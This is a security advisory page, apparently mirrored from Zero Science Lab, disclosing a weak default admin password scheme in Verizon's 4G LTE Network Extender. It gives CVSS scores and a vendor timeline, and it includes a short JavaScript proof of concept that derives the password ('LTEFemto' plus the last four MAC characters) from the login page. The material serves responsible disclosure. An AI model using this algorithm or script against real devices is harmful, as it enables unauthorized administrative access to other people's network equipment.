Lucene search

K
zeroscienceGjoko KrsticZSL-2022-5701
HistoryApr 13, 2022 - 12:00 a.m.

Verizon 4G LTE Network Extender Weak Credentials Algorithm

2022-04-1300:00:00
Gjoko Krstic
zeroscience.mk
301
verizon
lte network extender
weak credentials
security bypass
mac address
default admin password
vulnerability
exploit
zero science lab

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.002

Percentile

56.3%

Title: Verizon 4G LTE Network Extender Weak Credentials Algorithm
Advisory ID: ZSL-2022-5701
Type: Local/Remote
Impact: Security Bypass
Risk: (3/5)
Release Date: 13.04.2022

Summary

An LTE Network Extender enhances your indoor and 4G LTE data and voice coverage to provide better service for your 4G LTE mobile devices. It’s an extension of our 4G LTE network that’s placed directly in your home or office. The LTE Network Extender works with all Verizon-sold 4G LTE mobile devices for 4G LTE data service and HD Voice-capable 4G LTE devices for voice service. This easy-to-install device operates like a miniature cell tower that plugs into your existing high-speed broadband connection to communicate with the Verizon wireless network.

Description

Verizon’s 4G LTE Network Extender is utilising a weak default admin password generation algorithm. The password is generated using the last 4 values from device’s MAC address which is disclosed on the main webUI login page to an unauthenticated attacker. The values are then concatenated with the string ‘LTEFemto’ resulting in something like ‘LTEFemtoD080’ as the default Admin password.

Vendor

Verizon Communications Inc. - <https://www.verizon.com>

Affected Version

GA4.38 - V0.4.038.2131

Tested On

lighttpd-web

Vendor Status

[17.02.2022] Vulnerability discovered.
[23.02.2022] Vendor contacted.
[24.02.2022] Vendor responds asking more details.
[24.02.2022] Sent details to the vendor.
[06.03.2022] Asked vendor for status update.
[07.03.2022] Vendor has sent the report over to product security team. As soon as they have time to assess, vendor will give us an update.
[12.04.2022] No response from the vendor.
[13.04.2022] Public security advisory released.

PoC

Exploit.js

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://packetstormsecurity.com/files/166712/&gt;
[2] <https://cxsecurity.com/issue/WLB-2022040047&gt;
[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/224210&gt;
[4] <https://www.exploit-db.com/exploits/50875&gt;
[5] <https://vulners.com/cve/CVE-2022-29729&gt;
[6] <https://nvd.nist.gov/vuln/detail/CVE-2022-29729&gt;

Changelog

[13.04.2022] - Initial release
[14.04.2022] - Added reference [3]
[20.04.2022] - Added reference [4]
[29.05.2022] - Added reference [5] and [6]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>Verizon 4G LTE Network Extender Weak Credentials Algorithm


Vendor: Verizon Communications Inc.
Product web page: https://www.verizon.com
Affected version: GA4.38 - V0.4.038.2131

Summary: An LTE Network Extender enhances your indoor and 4G
LTE data and voice coverage to provide better service for your
4G LTE mobile devices. It's an extension of our 4G LTE network
that's placed directly in your home or office. The LTE Network
Extender works with all Verizon-sold 4G LTE mobile devices for
4G LTE data service and HD Voice-capable 4G LTE devices for voice
service. This easy-to-install device operates like a miniature
cell tower that plugs into your existing high-speed broadband
connection to communicate with the Verizon wireless network.

Desc: Verizon's 4G LTE Network Extender is utilising a weak
default admin password generation algorithm. The password is
generated using the last 4 values from device's MAC address
which is disclosed on the main webUI login page to an unauthenticated
attacker. The values are then concatenated with the string
'LTEFemto' resulting in something like 'LTEFemtoD080' as the
default Admin password.

Tested on: lighttpd-web


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5701
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5701.php


17.02.2022

--


snippet:///Exploit
//
// Verizon 4G LTE Network Extender Super Awesome JS Exploit
//

console.log("Calling 'isDefaultPassword' API");
let req = new Request("/webapi/isDefaultPassword");
let def = req.url;

const doAjax = async () =&gt; {
  const resp = await fetch(def);
  if (resp.ok) {
    const jsonyo = await resp.json();
    return Promise.resolve(jsonyo);
  } else {
    return Promise.reject("Smth not rite captain!");
  }
}
doAjax().then(console.log).catch(console.log);

await new Promise(t =&gt; setTimeout(t, 1337));

console.log("Verizon Admin Password: ");
let mac = document.querySelector("#mac_address").innerHTML;
console.log("LTEFemto" + mac.substr(-4));
</p></body></html>

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.002

Percentile

56.3%

Related for ZSL-2022-5701